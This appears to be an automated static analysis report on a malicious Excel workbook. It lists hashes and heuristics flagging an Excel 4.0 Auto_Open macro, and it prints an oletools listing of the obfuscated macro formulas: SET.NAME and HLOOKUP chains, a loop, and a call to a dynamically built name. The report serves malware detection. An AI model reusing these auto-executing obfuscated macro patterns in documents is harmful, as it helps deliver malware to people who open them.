Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02ef4553a6cc35be…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 2020-11-27 11:37:38
Authoring application: Microsoft Excel
First seen: 2021-01-11
MD5: 6d79fe75e628548cc43f180a9fbf5abc
SHA-1: 59f475bcfc2fccd6002311e4f7a1b53ffe6a6f01
SHA-256: 02ef4553a6cc35bec40d0b3b2e4d3a5389de6c793c35990520cc21e9a732fd92
Risk Score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] (OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] (OLE_XLM_DANGEROUS_FN)
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] (OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6840 bytes
SHA-256: d209f1b186bd1dc818a714e1a5a6c229e2ea670e31dbc38b2c07158de5fd21a4

Preview (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  nIhItTrVF
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C147 
' 0018     22 LABEL : Cell Value, String Constant - chhERzI len=0 
' 0018     21 LABEL : Cell Value, String Constant - CPIgQR len=0 
' 0018     26 LABEL : Cell Value, String Constant - djwvdWUqThG len=0 
' 0018     27 LABEL : Cell Value, String Constant - dyDjcTyHueWR len=0 
' 0018     23 LABEL : Cell Value, String Constant - edspfppb len=0 
' 0018     24 LABEL : Cell Value, String Constant - EyRebbpZQ len=0 
' 0018     26 LABEL : Cell Value, String Constant - JGgwcjdJvux len=0 
' 0018     21 LABEL : Cell Value, String Constant - JHXfNc len=0 
' 0018     24 LABEL : Cell Value, String Constant - jvNDMsbln len=0 
' 0018     25 LABEL : Cell Value, String Constant - JyFJFBqMbs len=0 
' 0018     20 LABEL : Cell Value, String Constant - Kpxnx len=0 
' 0018     25 LABEL : Cell Value, String Constant - lniOETVnCh len=0 
' 0018     23 LABEL : Cell Value, String Constant - lppJPcjb len=0 
' 0018     26 LABEL : Cell Value, String Constant - qYACUpLqzcU len=0 
' 0018     26 LABEL : Cell Value, String Constant - RLMpoDUkrlY len=0 
' 0018     23 LABEL : Cell Value, String Constant - UgcTDhrj len=0 
' 0018     25 LABEL : Cell Value, String Constant - wWByoazrie len=0 
' 0018     26 LABEL : Cell Value, String Constant - YBuPfkvstSV len=0 
' 0018     27 LABEL : Cell Value, String Constant - YPXfJippdVOG len=0 
' 0018     27 LABEL : Cell Value, String Constant - zjqnJnEHHAco len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  nIhItTrVF,C57,"SET.NAME("JGgwcjdJvux",0+VALUE("0"))",""
'  nIhItTrVF,C59,"SET.NAME("chhERzI",JGgwcjdJvux)",""
'  nIhItTrVF,C62,"SET.NAME("Kpxnx",JGgwcjdJvux)",""
'  nIhItTrVF,S65,"",-731.00000000000000000000
'  nIhItTrVF,C66,"SET.NAME("jvNDMsbln",COUNTA(dyDjcTyHueWR))",""
'  nIhItTrVF,S66,"",143.00000000000000000000
'  nIhItTrVF,S67,"",780.00000000000000000000
'  nIhItTrVF,S68,"",-292.00000000000000000000
'  nIhItTrVF,C69,"SET.NAME("JHXfNc",COUNTA(EyRebbpZQ))",""
'  nIhItTrVF,S69,"",-49.00000000000000000000
'  nIhItTrVF,S70,"",386.00000000000000000000
'  nIhItTrVF,C72,[],""
'  nIhItTrVF,C77,"SET.NAME("YPXfJippdVOG","")",""
'  nIhItTrVF,C82,"chhERzI",""
'  nIhItTrVF,C84,"SET.NAME("lniOETVnCh",HLOOKUP("*",dyDjcTyHueWR,chhERzI,FALSE))",""
'  nIhItTrVF,C89,"UgcTDhrj",""
'  nIhItTrVF,C92,"SET.NAME("zjqnJnEHHAco",JGgwcjdJvux)",""
'  nIhItTrVF,C95,[],""
'  nIhItTrVF,C100,"zjqnJnEHHAco",""
'  nIhItTrVF,C105,"RLMpoDUkrlY",""
'  nIhItTrVF,C108,"edspfppb",""
'  nIhItTrVF,C111,"wWByoazrie",""
'  nIhItTrVF,C116,"SET.NAME("YBuPfkvstSV",VALUE(HLOOKUP("*",EyRebbpZQ,wWByoazrie,FALSE)))",""
'  nIhItTrVF,C119,"CPIgQR",""
'  nIhItTrVF,C123,"YPXfJippdVOG",""
'  nIhItTrVF,C126,"Kpxnx",""
'  nIhItTrVF,C128,NEXT(),""
'  nIhItTrVF,C132,"qYACUpLqzcU",""
'  nIhItTrVF,C135,[],""
'  nIhItTrVF,C138,"lppJPcjb",""
'  nIhItTrVF,C141,NEXT(),""
'  nIhItTrVF,C143,RETURN(),""
'  nIhItTrVF,C166,"SET.NAME("djwvdWUqThG",C57)",""
'  nIhItTrVF,C171,"dyDjcTyHueWR",""
'  nIhItTrVF,C173,"SET.NAME("EyRebbpZQ",R66C11)",""
'  nIhItTrVF,C178,"SET.NAME("lppJPcjb",187)",""
'  nIhItTrVF,C181,"SET.NAME("JyFJFBqMbs",3)",""
'  nIhItTrVF,C186,djwvdWUqThG(),""
'  nIhItTrVF,C187,HALT(),""